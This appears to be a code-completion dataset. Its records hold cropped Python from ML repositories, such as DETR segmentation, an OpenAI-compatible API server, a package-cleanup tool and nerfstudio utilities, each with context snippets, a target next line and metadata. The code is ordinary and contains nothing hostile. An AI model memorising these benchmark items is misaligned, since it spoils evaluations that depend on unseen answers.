nn.Conv2d(ldm_prior[0], ldm_prior[0], 3, stride=2, padding=1),
)
self.layer2 = nn.Sequential(
nn.Conv2d(ldm_prior[1], ldm_prior[1], 3, stride=2, padding=1),
)
self.out_layer = nn.Sequential(
nn.Conv2d(sum(ldm_prior), out_dim, 1),
nn.GroupNorm(16, out_dim),
nn.ReLU(),
)
self.apply(self._init_weights)
### stable diffusion layers
config = OmegaConf.load('./v1-inference.yaml')
if sd_path is None:
config.model.params.ckpt_path = '../checkpoints/v1-5-pruned-emaonly.ckpt'
else:
config.model.params.ckpt_path = f'../{sd_path}'
sd_model = instantiate_from_config(config.model)
self.encoder_vq = sd_model.first_stage_model
self.unet = UNetWrapper(sd_model.model, use_attn=False)
del sd_model.cond_stage_model
del self.encoder_vq.decoder
del self.unet.unet.diffusion_model.out
for param in self.encoder_vq.parameters():
param.requires_grad = False
if dataset == 'nyu': | self.text_adapter = TextAdapterDepth(text_dim=text_dim) | 1 | 2023-12-15 14:13:59+00:00 | 2k |
penghao-wu/vstar | VisualSearch/model/owlvit/segmentation.py | [
{
"identifier": "box_ops",
"path": "VisualSearch/model/owlvit/util/box_ops.py",
"snippet": "def box_cxcywh_to_xyxy(x):\ndef box_xyxy_to_cxcywh(x):\ndef box_iou(boxes1, boxes2):\ndef generalized_box_iou(boxes1, boxes2):\ndef masks_to_boxes(masks):"
},
{
"identifier": "NestedTensor",
"path": "VisualSearch/model/owlvit/util/misc.py",
"snippet": "class NestedTensor(object):\n def __init__(self, tensors, mask: Optional[Tensor]):\n self.tensors = tensors\n self.mask = mask\n\n def to(self, device, non_blocking=False):\n # type: (Device) -> NestedTensor # noqa\n cast_tensor = self.tensors.to(device, non_blocking=non_blocking)\n mask = self.mask\n if mask is not None:\n assert mask is not None\n cast_mask = mask.to(device, non_blocking=non_blocking)\n else:\n cast_mask = None\n return NestedTensor(cast_tensor, cast_mask)\n\n def record_stream(self, *args, **kwargs):\n self.tensors.record_stream(*args, **kwargs)\n if self.mask is not None:\n self.mask.record_stream(*args, **kwargs)\n\n def decompose(self):\n return self.tensors, self.mask\n\n def __repr__(self):\n return str(self.tensors)"
},
{
"identifier": "interpolate",
"path": "VisualSearch/model/owlvit/util/misc.py",
"snippet": "def interpolate(input, size=None, scale_factor=None, mode=\"nearest\", align_corners=None):\n # type: (Tensor, Optional[List[int]], Optional[float], str, Optional[bool]) -> Tensor\n \"\"\"\n Equivalent to nn.functional.interpolate, but with support for empty batch sizes.\n This will eventually be supported natively by PyTorch, and this\n class can go away.\n \"\"\"\n if float(torchvision.__version__[:3]) < 0.7:\n if input.numel() > 0:\n return torch.nn.functional.interpolate(\n input, size, scale_factor, mode, align_corners\n )\n\n output_shape = _output_size(2, input, size, scale_factor)\n output_shape = list(input.shape[:-2]) + list(output_shape)\n if float(torchvision.__version__[:3]) < 0.5:\n return _NewEmptyTensorOp.apply(input, output_shape)\n return _new_empty_tensor(input, output_shape)\n else:\n return torchvision.ops.misc.interpolate(input, size, scale_factor, mode, align_corners)"
},
{
"identifier": "nested_tensor_from_tensor_list",
"path": "VisualSearch/model/owlvit/util/misc.py",
"snippet": "def nested_tensor_from_tensor_list(tensor_list: List[Tensor]):\n # TODO make this more general\n if tensor_list[0].ndim == 3:\n # TODO make it support different-sized images\n max_size = _max_by_axis([list(img.shape) for img in tensor_list])\n # min_size = tuple(min(s) for s in zip(*[img.shape for img in tensor_list]))\n batch_shape = [len(tensor_list)] + max_size\n b, c, h, w = batch_shape\n dtype = tensor_list[0].dtype\n device = tensor_list[0].device\n tensor = torch.zeros(batch_shape, dtype=dtype, device=device)\n mask = torch.ones((b, h, w), dtype=torch.bool, device=device)\n for img, pad_img, m in zip(tensor_list, tensor, mask):\n pad_img[: img.shape[0], : img.shape[1], : img.shape[2]].copy_(img)\n m[: img.shape[1], :img.shape[2]] = False\n else:\n raise ValueError('not supported')\n return NestedTensor(tensor, mask)"
}
] | import io
import torch
import torch.nn as nn
import torch.nn.functional as F
from collections import defaultdict
from PIL import Image
from .util import box_ops
from .util.misc import NestedTensor, interpolate, nested_tensor_from_tensor_list
from panopticapi.utils import id2rgb, rgb2id | 1,175 | # ------------------------------------------------------------------------
# Deformable DETR
# Copyright (c) 2020 SenseTime. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 [see LICENSE for details]
# ------------------------------------------------------------------------
# Modified from DETR (https://github.com/facebookresearch/detr)
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
# ------------------------------------------------------------------------
"""
This file provides the definition of the convolutional heads used to predict masks, as well as the losses
"""
try:
except ImportError:
pass
class DETRsegm(nn.Module):
def __init__(self, detr, freeze_detr=False):
super().__init__()
self.detr = detr
if freeze_detr:
for p in self.parameters():
p.requires_grad_(False)
hidden_dim, nheads = detr.transformer.d_model, detr.transformer.nhead
self.bbox_attention = MHAttentionMap(hidden_dim, hidden_dim, nheads, dropout=0)
self.mask_head = MaskHeadSmallConv(hidden_dim + nheads, [1024, 512, 256], hidden_dim)
def forward(self, samples: NestedTensor):
if not isinstance(samples, NestedTensor):
| # ------------------------------------------------------------------------
# Deformable DETR
# Copyright (c) 2020 SenseTime. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 [see LICENSE for details]
# ------------------------------------------------------------------------
# Modified from DETR (https://github.com/facebookresearch/detr)
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
# ------------------------------------------------------------------------
"""
This file provides the definition of the convolutional heads used to predict masks, as well as the losses
"""
try:
except ImportError:
pass
class DETRsegm(nn.Module):
def __init__(self, detr, freeze_detr=False):
super().__init__()
self.detr = detr
if freeze_detr:
for p in self.parameters():
p.requires_grad_(False)
hidden_dim, nheads = detr.transformer.d_model, detr.transformer.nhead
self.bbox_attention = MHAttentionMap(hidden_dim, hidden_dim, nheads, dropout=0)
self.mask_head = MaskHeadSmallConv(hidden_dim + nheads, [1024, 512, 256], hidden_dim)
def forward(self, samples: NestedTensor):
if not isinstance(samples, NestedTensor): | samples = nested_tensor_from_tensor_list(samples) | 3 | 2023-12-15 14:58:24+00:00 | 2k |
ValdonVitija/crap | crap/crap_manager.py | [
{
"identifier": "PythonFileAnalyzer",
"path": "crap/file_analyzer.py",
"snippet": "class PythonFileAnalyzer:\n def __init__(self, file_path: pathlib.Path):\n self.file_path = file_path\n self.imported_modules = set()\n\n def analyze(self):\n \"\"\"\n Analyzes the Python file and extracts the imported modules.\n \"\"\"\n code = self.file_path.read_text()\n tree = ast.parse(code)\n visitor = ImportsVisitor()\n visitor.visit(tree)\n self.imported_modules = visitor.imported_modules"
},
{
"identifier": "VirtualEnvChecker",
"path": "crap/virtual_env_checker.py",
"snippet": "class VirtualEnvChecker:\n def __init__(self):\n self.venv_indicators = {\n \"linux\": {\"bin\", \"include\", \"lib\", \"pyvenv.cfg\"},\n \"win32\": {\"Scripts\", \"Include\", \"Lib\", \"pyvenv.cfg\"}\n }\n\n def is_likely_venv(self, path):\n \"\"\"\n Checks if the given path is likely to be a virtual environment.\n \n Args:\n path (str): The path to check.\n\n Returns:\n bool: True if the path is likely to be a virtual environment, False otherwise.\n \"\"\"\n platform = sys.platform\n indicators = self.venv_indicators.get(platform, set())\n return all(os.path.exists(os.path.join(path, ind)) for ind in indicators)"
},
{
"identifier": "PackageUsageCounter",
"path": "crap/package_usage_counter.py",
"snippet": "class PackageUsageCounter:\n def __init__(self):\n self.pack_counter = get_package_counter_dict()\n\n def increment_package_count(self, package):\n if package in self.pack_counter:\n self.pack_counter[package] += 1\n\n def get_unused_packages(self, important_packages) -> List[str]:\n \"\"\"\n Returns a list of unused packages.\n\n A package is considered unused if its count is 0 and it is not in the list of important packages.\n \n Args:\n important_packages (List[str]): A list of important packages.\n\n Returns:\n List[str]: A list of unused packages.\n \"\"\"\n return [pkg for pkg, count in self.pack_counter.items() if count == 0 and pkg not in important_packages]"
},
{
"identifier": "uninstall_package",
"path": "crap/subprocesses.py",
"snippet": "def uninstall_package(package_name: str):\n \"\"\"Uninstall a given package.\"\"\"\n execute_command_without_output([\"pip3\", \"uninstall\", \"-y\", package_name])"
},
{
"identifier": "pre_cleanup_with_ruff",
"path": "crap/subprocesses.py",
"snippet": "def pre_cleanup_with_ruff(path_):\n \"\"\"\n Pre cleanup with ruff\n \"\"\"\n execute_command_without_output([\"ruff\", \"check\", path_, \"--fix\"])"
},
{
"identifier": "reinstall_from_requirements",
"path": "crap/subprocesses.py",
"snippet": "def reinstall_from_requirements() -> None:\n \"\"\"Reinstall packages from requirements.txt.\"\"\"\n req_path = pathlib.Path(__file__).parent / \"data\" / \"req.txt\"\n execute_command_without_output(\n [\"pip3\", \"install\", \"-r\", req_path, \"--no-cache-dir\"]\n )"
},
{
"identifier": "freeze_into_requirements",
"path": "crap/subprocesses.py",
"snippet": "def freeze_into_requirements():\n \"\"\"Freeze current environment to requirements.txt.\"\"\"\n req_path = pathlib.Path(__file__).parent / \"data\" / \"req.txt\"\n try:\n with open(req_path, \"w\") as file_:\n subprocess.run([\"pip3\", \"freeze\"], stdout=file_)\n except Exception as ex:\n print(ex)"
},
{
"identifier": "get_current_packages",
"path": "crap/subprocesses.py",
"snippet": "def get_current_packages() -> set:\n \"\"\"Get the current packages installed in the environment.\"\"\"\n process = subprocess.run([\"pip3\", \"freeze\"], capture_output=True, text=True)\n output = process.stdout.strip()\n packages = set(line.split(\"==\")[0] for line in output.split(\"\\n\"))\n return packages"
}
] | import os
import pathlib
from typing import Set
from tqdm import tqdm
from crap.file_analyzer import PythonFileAnalyzer
from crap.virtual_env_checker import VirtualEnvChecker
from crap.package_usage_counter import PackageUsageCounter
from crap.subprocesses import (
uninstall_package,
pre_cleanup_with_ruff,
reinstall_from_requirements,
freeze_into_requirements,
get_current_packages
) | 1,101 |
class CrapManager:
__slots__ = ("path_", "venv_checker", "package_usage_counter", "deleted_packages")
def __init__(self, path_: str):
self.path_ = pathlib.Path(path_).absolute()
self.venv_checker = VirtualEnvChecker()
self.package_usage_counter = PackageUsageCounter()
self.deleted_packages = set()
def run(self):
if not self.path_.exists():
raise FileNotFoundError("File/Dir not found")
total_steps = 4
bar_width = 100
bar_color = 'red'
with tqdm(total=total_steps, ncols=bar_width, colour=bar_color) as pbar:
self._process_path()
pbar.update(1)
|
class CrapManager:
__slots__ = ("path_", "venv_checker", "package_usage_counter", "deleted_packages")
def __init__(self, path_: str):
self.path_ = pathlib.Path(path_).absolute()
self.venv_checker = VirtualEnvChecker()
self.package_usage_counter = PackageUsageCounter()
self.deleted_packages = set()
def run(self):
if not self.path_.exists():
raise FileNotFoundError("File/Dir not found")
total_steps = 4
bar_width = 100
bar_color = 'red'
with tqdm(total=total_steps, ncols=bar_width, colour=bar_color) as pbar:
self._process_path()
pbar.update(1)
| initial_packages = get_current_packages() | 7 | 2023-12-19 20:22:37+00:00 | 2k |
worm128/AI-YinMei | text-generation-webui/extensions/openai/script.py | [
{
"identifier": "ChatCompletionRequest",
"path": "text-generation-webui/extensions/openai/typing.py",
"snippet": "class ChatCompletionRequest(GenerationOptions, ChatCompletionRequestParams):\n pass"
},
{
"identifier": "ChatCompletionResponse",
"path": "text-generation-webui/extensions/openai/typing.py",
"snippet": "class ChatCompletionResponse(BaseModel):\n id: str\n choices: List[dict]\n created: int = int(time.time())\n model: str\n object: str = \"chat.completion\"\n usage: dict"
},
{
"identifier": "CompletionRequest",
"path": "text-generation-webui/extensions/openai/typing.py",
"snippet": "class CompletionRequest(GenerationOptions, CompletionRequestParams):\n pass"
},
{
"identifier": "CompletionResponse",
"path": "text-generation-webui/extensions/openai/typing.py",
"snippet": "class CompletionResponse(BaseModel):\n id: str\n choices: List[dict]\n created: int = int(time.time())\n model: str\n object: str = \"text_completion\"\n usage: dict"
},
{
"identifier": "DecodeRequest",
"path": "text-generation-webui/extensions/openai/typing.py",
"snippet": "class DecodeRequest(BaseModel):\n tokens: List[int]"
},
{
"identifier": "DecodeResponse",
"path": "text-generation-webui/extensions/openai/typing.py",
"snippet": "class DecodeResponse(BaseModel):\n text: str"
},
{
"identifier": "EmbeddingsRequest",
"path": "text-generation-webui/extensions/openai/typing.py",
"snippet": "class EmbeddingsRequest(BaseModel):\n input: str | List[str]\n model: str | None = Field(default=None, description=\"Unused parameter. To change the model, set the OPENEDAI_EMBEDDING_MODEL and OPENEDAI_EMBEDDING_DEVICE environment variables before starting the server.\")\n encoding_format: str = Field(default=\"float\", description=\"Can be float or base64.\")\n user: str | None = Field(default=None, description=\"Unused parameter.\")"
},
{
"identifier": "EmbeddingsResponse",
"path": "text-generation-webui/extensions/openai/typing.py",
"snippet": "class EmbeddingsResponse(BaseModel):\n index: int\n embedding: List[float]\n object: str = \"embedding\""
},
{
"identifier": "EncodeRequest",
"path": "text-generation-webui/extensions/openai/typing.py",
"snippet": "class EncodeRequest(BaseModel):\n text: str"
},
{
"identifier": "EncodeResponse",
"path": "text-generation-webui/extensions/openai/typing.py",
"snippet": "class EncodeResponse(BaseModel):\n tokens: List[int]\n length: int"
},
{
"identifier": "LoadLorasRequest",
"path": "text-generation-webui/extensions/openai/typing.py",
"snippet": "class LoadLorasRequest(BaseModel):\n lora_names: List[str]"
},
{
"identifier": "LoadModelRequest",
"path": "text-generation-webui/extensions/openai/typing.py",
"snippet": "class LoadModelRequest(BaseModel):\n model_name: str\n args: dict | None = None\n settings: dict | None = None"
},
{
"identifier": "LogitsRequest",
"path": "text-generation-webui/extensions/openai/typing.py",
"snippet": "class LogitsRequest(GenerationOptions, LogitsRequestParams):\n pass"
},
{
"identifier": "LogitsResponse",
"path": "text-generation-webui/extensions/openai/typing.py",
"snippet": "class LogitsResponse(BaseModel):\n logits: dict"
},
{
"identifier": "LoraListResponse",
"path": "text-generation-webui/extensions/openai/typing.py",
"snippet": "class LoraListResponse(BaseModel):\n lora_names: List[str]"
},
{
"identifier": "ModelInfoResponse",
"path": "text-generation-webui/extensions/openai/typing.py",
"snippet": "class ModelInfoResponse(BaseModel):\n model_name: str\n lora_names: List[str]"
},
{
"identifier": "ModelListResponse",
"path": "text-generation-webui/extensions/openai/typing.py",
"snippet": "class ModelListResponse(BaseModel):\n model_names: List[str]"
},
{
"identifier": "TokenCountResponse",
"path": "text-generation-webui/extensions/openai/typing.py",
"snippet": "class TokenCountResponse(BaseModel):\n length: int"
},
{
"identifier": "to_dict",
"path": "text-generation-webui/extensions/openai/typing.py",
"snippet": "def to_dict(obj):\n return obj.__dict__"
}
] | import asyncio
import json
import os
import traceback
import speech_recognition as sr
import uvicorn
import extensions.openai.completions as OAIcompletions
import extensions.openai.embeddings as OAIembeddings
import extensions.openai.images as OAIimages
import extensions.openai.logits as OAIlogits
import extensions.openai.models as OAImodels
import extensions.openai.moderations as OAImoderations
from threading import Thread
from fastapi import Depends, FastAPI, Header, HTTPException
from fastapi.middleware.cors import CORSMiddleware
from fastapi.requests import Request
from fastapi.responses import JSONResponse
from pydub import AudioSegment
from sse_starlette import EventSourceResponse
from extensions.openai.errors import ServiceUnavailableError
from extensions.openai.tokens import token_count, token_decode, token_encode
from extensions.openai.utils import _start_cloudflared
from modules import shared
from modules.logging_colors import logger
from modules.models import unload_model
from modules.text_generation import stop_everything_event
from .typing import (
ChatCompletionRequest,
ChatCompletionResponse,
CompletionRequest,
CompletionResponse,
DecodeRequest,
DecodeResponse,
EmbeddingsRequest,
EmbeddingsResponse,
EncodeRequest,
EncodeResponse,
LoadLorasRequest,
LoadModelRequest,
LogitsRequest,
LogitsResponse,
LoraListResponse,
ModelInfoResponse,
ModelListResponse,
TokenCountResponse,
to_dict
) | 1,543 |
params = {
'embedding_device': 'cpu',
'embedding_model': 'sentence-transformers/all-mpnet-base-v2',
'sd_webui_url': '',
'debug': 0
}
streaming_semaphore = asyncio.Semaphore(1)
def verify_api_key(authorization: str = Header(None)) -> None:
expected_api_key = shared.args.api_key
if expected_api_key and (authorization is None or authorization != f"Bearer {expected_api_key}"):
raise HTTPException(status_code=401, detail="Unauthorized")
def verify_admin_key(authorization: str = Header(None)) -> None:
expected_api_key = shared.args.admin_key
if expected_api_key and (authorization is None or authorization != f"Bearer {expected_api_key}"):
raise HTTPException(status_code=401, detail="Unauthorized")
app = FastAPI()
check_key = [Depends(verify_api_key)]
check_admin_key = [Depends(verify_admin_key)]
# Configure CORS settings to allow all origins, methods, and headers
app.add_middleware(
CORSMiddleware,
allow_origins=["*"],
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"]
)
@app.options("/", dependencies=check_key)
async def options_route():
return JSONResponse(content="OK")
@app.post('/v1/completions', response_model=CompletionResponse, dependencies=check_key)
async def openai_completions(request: Request, request_data: CompletionRequest):
path = request.url.path
is_legacy = "/generate" in path
if request_data.stream:
async def generator():
async with streaming_semaphore:
response = OAIcompletions.stream_completions(to_dict(request_data), is_legacy=is_legacy)
for resp in response:
disconnected = await request.is_disconnected()
if disconnected:
break
yield {"data": json.dumps(resp)}
return EventSourceResponse(generator()) # SSE streaming
else:
response = OAIcompletions.completions(to_dict(request_data), is_legacy=is_legacy)
return JSONResponse(response)
|
params = {
'embedding_device': 'cpu',
'embedding_model': 'sentence-transformers/all-mpnet-base-v2',
'sd_webui_url': '',
'debug': 0
}
streaming_semaphore = asyncio.Semaphore(1)
def verify_api_key(authorization: str = Header(None)) -> None:
expected_api_key = shared.args.api_key
if expected_api_key and (authorization is None or authorization != f"Bearer {expected_api_key}"):
raise HTTPException(status_code=401, detail="Unauthorized")
def verify_admin_key(authorization: str = Header(None)) -> None:
expected_api_key = shared.args.admin_key
if expected_api_key and (authorization is None or authorization != f"Bearer {expected_api_key}"):
raise HTTPException(status_code=401, detail="Unauthorized")
app = FastAPI()
check_key = [Depends(verify_api_key)]
check_admin_key = [Depends(verify_admin_key)]
# Configure CORS settings to allow all origins, methods, and headers
app.add_middleware(
CORSMiddleware,
allow_origins=["*"],
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"]
)
@app.options("/", dependencies=check_key)
async def options_route():
return JSONResponse(content="OK")
@app.post('/v1/completions', response_model=CompletionResponse, dependencies=check_key)
async def openai_completions(request: Request, request_data: CompletionRequest):
path = request.url.path
is_legacy = "/generate" in path
if request_data.stream:
async def generator():
async with streaming_semaphore:
response = OAIcompletions.stream_completions(to_dict(request_data), is_legacy=is_legacy)
for resp in response:
disconnected = await request.is_disconnected()
if disconnected:
break
yield {"data": json.dumps(resp)}
return EventSourceResponse(generator()) # SSE streaming
else:
response = OAIcompletions.completions(to_dict(request_data), is_legacy=is_legacy)
return JSONResponse(response)
| @app.post('/v1/chat/completions', response_model=ChatCompletionResponse, dependencies=check_key) | 1 | 2023-12-20 14:13:38+00:00 | 2k |
foocker/Bert-VITS2-Faster | infer_torch_export_onnx.py | [
{
"identifier": "infer",
"path": "infer_.py",
"snippet": "def get_net_g(model_path: str, version: str, device: str, hps):\ndef get_text(text, language_str, hps, device):\ndef infer(\n text,\n sdp_ratio,\n noise_scale,\n noise_scale_w,\n length_scale,\n language,\n sid,\n hps,\n net_g,\n device,\n skip_start=False,\n skip_end=False,\n g_model_name=None\n):"
},
{
"identifier": "config",
"path": "config.py",
"snippet": "class Resample_config:\nclass Preprocess_text_config:\nclass Bert_gen_config:\nclass Emo_gen_config:\nclass Train_ms_config:\nclass Webui_config:\nclass Server_config:\nclass Translate_config:\nclass Config:\n def __init__(self, in_dir: str, out_dir: str, sampling_rate: int = 44100):\n def from_dict(cls, dataset_path: str, data: Dict[str, any]):\n def __init__(\n self,\n transcription_path: str,\n cleaned_path: str,\n train_path: str,\n val_path: str,\n config_path: str,\n val_per_spk: int = 5,\n max_val_total: int = 10000,\n clean: bool = True,\n ):\n def from_dict(cls, dataset_path: str, data: Dict[str, any]):\n def __init__(\n self,\n config_path: str,\n num_processes: int = 2,\n device: str = \"cuda\",\n use_multi_device: bool = False,\n ):\n def from_dict(cls, dataset_path: str, data: Dict[str, any]):\n def __init__(\n self,\n config_path: str,\n num_processes: int = 2,\n device: str = \"cuda\",\n ):\n def from_dict(cls, dataset_path: str, data: Dict[str, any]):\n def __init__(\n self,\n config_path: str,\n env: Dict[str, any],\n base: Dict[str, any],\n model: str,\n ):\n def from_dict(cls, dataset_path: str, data: Dict[str, any]):\n def __init__(\n self,\n device: str,\n model: str,\n config_path: str,\n language_identification_library: str,\n port: int = 7860,\n share: bool = False,\n debug: bool = False,\n ):\n def from_dict(cls, dataset_path: str, data: Dict[str, any]):\n def __init__(\n self, models: List[Dict[str, any]], port: int = 5000, device: str = \"cuda\"\n ):\n def from_dict(cls, data: Dict[str, any]):\n def __init__(self, app_key: str, secret_key: str):\n def from_dict(cls, data: Dict[str, any]):\n def __init__(self, config_path: str):"
}
] | import os
import logging
import re_matching
import torch
import utils
import gradio as gr
import numpy as np
import time
from infer_ import infer, latest_version, get_net_g
from config import config
from scipy.io.wavfile import write | 940 |
logging.basicConfig(
level=logging.INFO, format="| %(name)s | %(levelname)s | %(message)s"
)
logger = logging.getLogger(__name__)
net_g = None
device = config.webui_config.device
if device == "mps":
os.environ["PYTORCH_ENABLE_MPS_FALLBACK"] = "1"
def generate_audio(
slices,
sdp_ratio,
noise_scale,
noise_scale_w,
length_scale,
speaker,
language,
skip_start=False,
skip_end=False,
):
audio_list = []
# silence = np.zeros(hps.data.sampling_rate // 2, dtype=np.int16)
with torch.no_grad():
for idx, piece in enumerate(slices):
skip_start = (idx != 0) and skip_start
skip_end = (idx != len(slices) - 1) and skip_end
|
logging.basicConfig(
level=logging.INFO, format="| %(name)s | %(levelname)s | %(message)s"
)
logger = logging.getLogger(__name__)
net_g = None
device = config.webui_config.device
if device == "mps":
os.environ["PYTORCH_ENABLE_MPS_FALLBACK"] = "1"
def generate_audio(
slices,
sdp_ratio,
noise_scale,
noise_scale_w,
length_scale,
speaker,
language,
skip_start=False,
skip_end=False,
):
audio_list = []
# silence = np.zeros(hps.data.sampling_rate // 2, dtype=np.int16)
with torch.no_grad():
for idx, piece in enumerate(slices):
skip_start = (idx != 0) and skip_start
skip_end = (idx != len(slices) - 1) and skip_end | audio = infer( | 0 | 2023-12-18 09:53:41+00:00 | 2k |
sinoyou/nelf-pro | nerfstudio/process_data/process_data_utils.py | [
{
"identifier": "status",
"path": "nerfstudio/utils/rich_utils.py",
"snippet": "def status(msg: str, spinner: str = \"bouncingBall\", verbose: bool = False):\n \"\"\"A context manager that does nothing is verbose is True. Otherwise it hides logs under a message.\n\n Args:\n msg: The message to log.\n spinner: The spinner to use.\n verbose: If True, print all logs, else hide them.\n \"\"\"\n if verbose:\n return nullcontext()\n return CONSOLE.status(msg, spinner=spinner)"
},
{
"identifier": "run_command",
"path": "nerfstudio/utils/scripts.py",
"snippet": "def run_command(cmd: str, verbose=False) -> Optional[str]:\n \"\"\"Runs a command and returns the output.\n\n Args:\n cmd: Command to run.\n verbose: If True, logs the output of the command.\n Returns:\n The output of the command if return_output is True, otherwise None.\n \"\"\"\n out = subprocess.run(cmd, capture_output=not verbose, shell=True, check=False)\n if out.returncode != 0:\n CONSOLE.rule(\"[bold red] :skull: :skull: :skull: ERROR :skull: :skull: :skull: \", style=\"red\")\n CONSOLE.print(f\"[bold red]Error running command: {cmd}\")\n CONSOLE.rule(style=\"red\")\n CONSOLE.print(out.stderr.decode(\"utf-8\"))\n sys.exit(1)\n if out.stdout is not None:\n return out.stdout.decode(\"utf-8\")\n return out"
}
] | import shutil
import sys
from enum import Enum
from pathlib import Path
from typing import List, Optional, Tuple
from rich.console import Console
from typing_extensions import Literal
from nerfstudio.utils.rich_utils import status
from nerfstudio.utils.scripts import run_command | 884 | # Copyright 2022 The Nerfstudio Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Helper utils for processing data into the nerfstudio format."""
CONSOLE = Console(width=120)
class CameraModel(Enum):
"""Enum for camera types."""
OPENCV = "OPENCV"
OPENCV_FISHEYE = "OPENCV_FISHEYE"
CAMERA_MODELS = {
"perspective": CameraModel.OPENCV,
"fisheye": CameraModel.OPENCV_FISHEYE,
}
def get_num_frames_in_video(video: Path) -> int:
"""Returns the number of frames in a video.
Args:
video: Path to a video.
Returns:
The number of frames in a video.
"""
cmd = f"ffprobe -v error -select_streams v:0 -count_packets \
-show_entries stream=nb_read_packets -of csv=p=0 {video}"
output = run_command(cmd)
assert output is not None
output = output.strip(" ,\t\n\r")
return int(output)
def convert_video_to_images(
video_path: Path, image_dir: Path, num_frames_target: int, verbose: bool = False
) -> Tuple[List[str], int]:
"""Converts a video into a sequence of images.
Args:
video_path: Path to the video.
output_dir: Path to the output directory.
num_frames_target: Number of frames to extract.
verbose: If True, logs the output of the command.
Returns:
A tuple containing summary of the conversion and the number of extracted frames.
"""
| # Copyright 2022 The Nerfstudio Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Helper utils for processing data into the nerfstudio format."""
CONSOLE = Console(width=120)
class CameraModel(Enum):
"""Enum for camera types."""
OPENCV = "OPENCV"
OPENCV_FISHEYE = "OPENCV_FISHEYE"
CAMERA_MODELS = {
"perspective": CameraModel.OPENCV,
"fisheye": CameraModel.OPENCV_FISHEYE,
}
def get_num_frames_in_video(video: Path) -> int:
"""Returns the number of frames in a video.
Args:
video: Path to a video.
Returns:
The number of frames in a video.
"""
cmd = f"ffprobe -v error -select_streams v:0 -count_packets \
-show_entries stream=nb_read_packets -of csv=p=0 {video}"
output = run_command(cmd)
assert output is not None
output = output.strip(" ,\t\n\r")
return int(output)
def convert_video_to_images(
video_path: Path, image_dir: Path, num_frames_target: int, verbose: bool = False
) -> Tuple[List[str], int]:
"""Converts a video into a sequence of images.
Args:
video_path: Path to the video.
output_dir: Path to the output directory.
num_frames_target: Number of frames to extract.
verbose: If True, logs the output of the command.
Returns:
A tuple containing summary of the conversion and the number of extracted frames.
"""
| with status(msg="Converting video to images...", spinner="bouncingBall", verbose=verbose): | 0 | 2023-12-15 20:07:22+00:00 | 2k |
wuc9521/rep-flow | app.py | [
{
"identifier": "read_keywords_from_file",
"path": "utils/loader.py",
"snippet": "def read_keywords_from_file(file_path, app: Flask = None):\n try:\n with open(file_path, 'r') as file:\n content = file.read()\n keywords_list = [keyword.strip() for keyword in re.split(',|\\n', content) if keyword.strip()]\n app.logger.info(f\"Keywords loaded: {keywords_list}\")\n return keywords_list\n\n except FileNotFoundError:\n app.logger.info(f\"Error: File '{file_path}' not found.\")\n return []"
},
{
"identifier": "HELP",
"path": "utils/hints.py",
"snippet": "HELP = get_HELP_HINT()"
},
{
"identifier": "get_NUMBER_EMBD_HINT",
"path": "utils/hints.py",
"snippet": "def get_NUMBER_EMBD_HINT(id):\n return f\"\"\"\n <ul class=\"hint-font\" onclick='handleHintClick(event)' style=\"list-style-type: none;\">\n <li><span>Monitoring Screen...</span></li>\n <li><span>Test:</span><span class='u-like'> [{id}] </span><span>launching...</span></li> \n <li><span>Test:</span><span class='u-like'> [{id}] </span><span>launched...</span></li> \n </ul>\n \"\"\""
},
{
"identifier": "get_CURRENT_STATE_HINT",
"path": "utils/hints.py",
"snippet": "def get_CURRENT_STATE_HINT(id):\n return \\\n f\"\"\"\n <ul class=\"hint-font\" onclick='handleHintClick(event)' style=\"list-style-type: none;\">\n <li><span>Monitoring Screen...</span></li>\n <li><span>Test:</span><span class='u-like'> [{id}] </span><span>ongoing...</span></li> \n </ul>\n \"\"\" if int(id) >= 0 else \\\n f\"\"\"\n <ul class=\"hint-font\" onclick='handleHintClick(event)' style=\"list-style-type: none;\">\n <li><span>Monitoring Screen...</span></li>\n <li><span>No test launched</span></li> \n </ul>\n \"\"\""
},
{
"identifier": "get_NEXT_STEP_HINT",
"path": "utils/hints.py",
"snippet": "def get_NEXT_STEP_HINT(id):\n return \\\n f\"\"\"\n <ul class=\"hint-font\" onclick='handleHintClick(event)' style=\"list-style-type: none;\">\n <li><span>Monitoring Screen...</span></li>\n <li><span>Test:</span><span class='u-like'> [{id}] </span><span>ongoing...</span></li> \n </ul>\n \"\"\""
},
{
"identifier": "extract_and_validate_test_number",
"path": "utils/test.py",
"snippet": "def extract_and_validate_test_number(query_text, app):\n \"\"\"\n refer to: https://regex101.com/r/x609CD/1\n \"\"\"\n match = re.match(r'\\/?test (\\d+)$', query_text)\n app.logger.info(f\"query_text: {query_text}\")\n if match:\n test_number = match.group(1)\n if test_number.isdigit():\n return test_number\n return None"
},
{
"identifier": "log_",
"path": "utils/log.py",
"snippet": "def log_(logger, level, message):\n cf = inspect.currentframe()\n caller_frame = cf.f_back\n caller_info = inspect.getframeinfo(caller_frame)\n log_message = f\"{caller_info.filename}:{caller_info.lineno} - {message}\"\n if level == 'info':\n logger.info(log_message)\n elif level == 'error':\n logger.error(log_message)\n elif level == 'warning':\n logger.warning(log_message)\n elif level == 'debug':\n logger.debug(log_message)\n else:\n raise ValueError(f\"Unsupported log level: {level}\")"
},
{
"identifier": "get_i",
"path": "utils/file.py",
